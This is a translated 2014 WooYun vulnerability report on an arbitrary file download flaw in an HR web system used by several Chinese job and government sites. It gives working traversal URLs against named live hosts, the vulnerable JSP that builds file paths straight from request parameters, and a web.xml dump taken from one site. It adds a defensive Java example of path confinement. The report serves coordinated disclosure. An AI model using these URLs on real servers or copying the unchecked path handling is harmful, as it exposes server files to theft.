
Vulnerability summary

Defect ID: wooyun-2014-062275

Title: Arbitrary file download in an HR system (multiple human-resources sites affected)

Vendor: CNCERT (National Internet Emergency Center)

Author: 风情万种

Submitted: 2014-05-30 10:31

Fix time: 2014-08-28 10:32

Published: 2014-08-28 10:32

Type: Arbitrary file traversal/download

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-05-30: Details sent to the vendor, awaiting vendor handling
2014-06-04: Vendor confirmed; details disclosed to the vendor only
2014-06-07: Details opened to third-party security partners
2014-07-29: Details disclosed to core white hats and domain experts
2014-08-08: Details disclosed to regular white hats
2014-08-18: Details disclosed to intern white hats
2014-08-28: Details disclosed to the public

Brief description:

Arbitrary file download in an HR system (multiple human-resources sites affected)

Detailed description:

Arbitrary file download links:
http://www.lhjy.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp
http://www.zjdeqing.lm.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp
http://www.lhrlzyw.com/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp
http://www.dqlm.com/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp
http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5Ctabledownload%5C&id=&filename=download.jsp
download.jsp performs no checks or filtering at all, so any file on the server can be downloaded. The only transformation applied to the url parameter is replacing the token redboy5711 with ":", which is how Dredboy5711%5C in the links above becomes the drive root D:\; url, id and filename are then concatenated into a path and served as-is.

<%@ page contentType="text/html;charset=gb2312"
import="com.jspsmart.upload.*,java.io.File" %><%
// Create a new SmartUpload object
SmartUpload su = new SmartUpload();
// Initialise it
su.initialize(pageContext);
// Set contentDisposition to null so the browser does not open the file
// automatically and clicking the link always downloads it. Without this,
// a .doc would be opened by Word and a .pdf by Acrobat.
su.setContentDisposition(null);
// Download the file: every path component is taken straight from the request
String url=request.getParameter("url");
url=url.replaceAll("redboy5711",":");   // the token stands in for ':', so "Dredboy5711\" becomes "D:\"
String id=request.getParameter("id");
String filename=request.getParameter("filename");
System.out.println("path11========="+filename);
//filename=new String(filename.getBytes("ISO-8859-1"),"GB2312");
System.out.println("path222========="+filename);
String path=url+id+File.separator+filename;   // no base directory, no traversal check
su.downloadFile(path);
%>
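As an added example (this is not the vendor's download.jsp and not part of the original report), the following shows how a download handler can confine a client-supplied sub-directory and file name to one fixed root instead of concatenating request parameters into a path. The class name SafeDownloadPath, the temporary root directory and the sample file names are constructed for illustration; the check itself is standard java.nio.file path canonicalisation plus a containment test.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example, not the vendor's code: confine a download request to one root.
// The root directory and file names below are constructed for illustration.
public final class SafeDownloadPath {

    private SafeDownloadPath() {}

    /**
     * Resolves id and filename below root and returns the real, symlink-resolved
     * path. Throws IllegalArgumentException for anything that escapes the root
     * or does not exist as a regular file.
     */
    public static Path resolve(Path root, String id, String filename) throws IOException {
        if (filename == null || filename.isEmpty()) {
            throw new IllegalArgumentException("filename is required");
        }
        // The client names a file, never a directory: refuse both separator
        // styles (the affected sites ran on Windows, where '\' separates) and NUL.
        if (containsAny(filename, "/\\\0")) {
            throw new IllegalArgumentException("filename must not contain path separators");
        }
        String sub = (id == null) ? "" : id;
        if (sub.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("id must not contain NUL");
        }

        Path realRoot = root.toRealPath();
        // Path.resolve() returns an absolute argument unchanged (e.g. "D:\" or "/etc"),
        // so the join alone proves nothing: normalize away ".." and test containment.
        // Path.startsWith compares whole name components, so "/srv/dl" does not
        // accidentally match "/srv/dl-private".
        Path candidate = realRoot.resolve(sub).resolve(filename).normalize();
        if (!candidate.startsWith(realRoot)) {
            throw new IllegalArgumentException("path escapes download root: " + sub + "/" + filename);
        }
        if (!Files.isRegularFile(candidate)) {
            throw new IllegalArgumentException("no such file: " + filename);
        }
        // Second check after resolving symlinks: a link inside the root that
        // points outside it would pass the lexical check above.
        Path real = candidate.toRealPath();
        if (!real.startsWith(realRoot)) {
            throw new IllegalArgumentException("path resolves outside download root");
        }
        return real;
    }

    private static boolean containsAny(String s, String chars) {
        for (int i = 0; i < chars.length(); i++) {
            if (s.indexOf(chars.charAt(i)) >= 0) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) throws IOException {
        // Constructed fixture: a temporary root holding one legitimate download.
        Path root = Files.createTempDirectory("downloads");
        Files.createDirectories(root.resolve("2014"));
        Files.write(root.resolve("2014").resolve("report.pdf"), new byte[] {0x25, 0x50, 0x44, 0x46});

        String[][] requests = {
            {"2014", "report.pdf"},                 // legitimate request
            {"../../WEB-INF", "web.xml"},           // traversal through the id parameter
            {"", "..\\web.xml"},                    // separator smuggled into the file name
            {root.getRoot().toString(), "hosts"},   // absolute id would replace the root entirely
        };
        for (String[] r : requests) {
            try {
                System.out.println("ALLOW " + resolve(root, r[0], r[1]));
            } catch (IllegalArgumentException e) {
                System.out.println("DENY  " + r[0] + " / " + r[1] + " : " + e.getMessage());
            }
        }
    }
}
```

Run with `java SafeDownloadPath.java`: only the first request is allowed, the other three are denied before any file is opened. In a servlet the returned Path would be the only value passed to the download routine, and the url parameter from the original handler would disappear entirely, since the root is fixed server-side.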


Let me try downloading web.xml as well:
http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5CWEB-INF%5C&id=&filename=web.xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
<web-app>
<display-name>TZSW WEB Application</display-name>

<session-config>
<session-timeout>15</session-timeout>
</session-config>

<filter>
<filter-name>EncodingFilter</filter-name>
<filter-class>com.tzsw.plat.webcontroller.EncodingFilter</filter-class>
</filter>
<filter>
<filter-name>HeadFilter</filter-name>
<filter-class>com.tzsw.plat.webcontroller.HeadFilter</filter-class>
</filter>
<filter>
<filter-name>SaftyFilter</filter-name>
<filter-class>com.tzsw.plat.webcontroller.SaftyFilter</filter-class>
</filter>



<filter-mapping>
<filter-name>EncodingFilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>EncodingFilter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>HeadFilter</filter-name>
<url-pattern>/MainServlet</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>SaftyFilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SaftyFilter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SaftyFilter</filter-name>
<url-pattern>/MainServlet</url-pattern>
</filter-mapping>
<servlet>
<servlet-name>MainServlet</servlet-name>
<servlet-class>com.tzsw.plat.webcontroller.MainServlet</servlet-class>
<init-param>
<param-name>wl-dispatch-policy</param-name>
<param-value>servletQueue</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>

<servlet>
<servlet-name>ActionServlet</servlet-name>
<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
<init-param>
<param-name>config</param-name>
<param-value>/WEB-INF/struts-config.xml</param-value>
</init-param>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>JMSListenerServlet</servlet-name>
<servlet-class>com.tzsw.plat.webcontroller.LogMsgServlet</servlet-class>
<load-on-startup>3</load-on-startup>
</servlet>
<servlet>
<servlet-name>Connector</servlet-name>
<servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
<init-param>
<param-name>baseDir</param-name>
<param-value>/UserFiles/</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet>
<servlet-name>SimpleUploader</servlet-name>
<servlet-class>com.fredck.FCKeditor.uploader.SimpleUploaderServlet</servlet-class>
<init-param>
<param-name>baseDir</param-name>
<param-value>/UserFiles/</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>enabled</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFile</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFile</param-name>
<param-value>php|php3|php5|phtml|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|reg|cgi</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsImage</param-name>
<param-value>jpg|gif|jpeg|png|bmp</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsImage</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFlash</param-name>
<param-value>swf|fla</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFlash</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>MainServlet</servlet-name>
<url-pattern>/MainServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>ActionServlet</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>JMSListenerServlet</servlet-name>
<url-pattern>/JMSListenerServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>Connector</servlet-name>
<url-pattern>/admin/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector</url-pattern>
</servlet-mapping>

<servlet-mapping>
<servlet-name>SimpleUploader</servlet-name>
<url-pattern>/admin/FCKeditor/editor/filemanager/upload/simpleuploader</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>default.jsp</welcome-file>
<welcome-file>login.jsp</welcome-file>
</welcome-file-list>

<!-- The default error page -->
<error-page>
<exception-type>java.lang.Exception</exception-type>
<location>/Error.jsp</location>
</error-page>
<taglib>
<taglib-uri>/FCKeditor</taglib-uri>
<taglib-location>/WEB-INF/FCKeditor.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/struts-bean.tld</taglib-uri>
<taglib-location>/WEB-INF/struts-bean.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/struts-html.tld</taglib-uri>
<taglib-location>/WEB-INF/struts-html.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/struts-logic.tld</taglib-uri>
<taglib-location>/WEB-INF/struts-logic.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/struts-template.tld</taglib-uri>
<taglib-location>/WEB-INF/struts-template.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/struts-tiles.tld</taglib-uri>
<taglib-location>/WEB-INF/struts-tiles.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/struts-nested.tld</taglib-uri>
<taglib-location>/WEB-INF/struts-nested.tld</taglib-location>
</taglib>

<resource-ref>
<res-ref-name>jdbc/webCoreDS</res-ref-name>
<res-type>javax.sql.DataSource</res-type>
<res-auth>Container</res-auth>
</resource-ref>
</web-app>

Proof of vulnerability:

[Screenshot: QQ截图20140525151347.png]


Fix suggestion:

....... No explanation needed.

Copyright notice: when reposting, please credit the source 风情万种@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-06-04 09:57

Vendor reply:

Based on the test results, the software vendor was confirmed to be 浙江天正思维信息技术有限公司 (Zhejiang Tianzheng Siwei Information Technology Co., Ltd.). The phone number in its published contact channels went unanswered. Following the test cases, the matter has been forwarded to the CNCERT Jiangxi and Zhejiang branch centers for case notification and handling.

Latest status:

None yet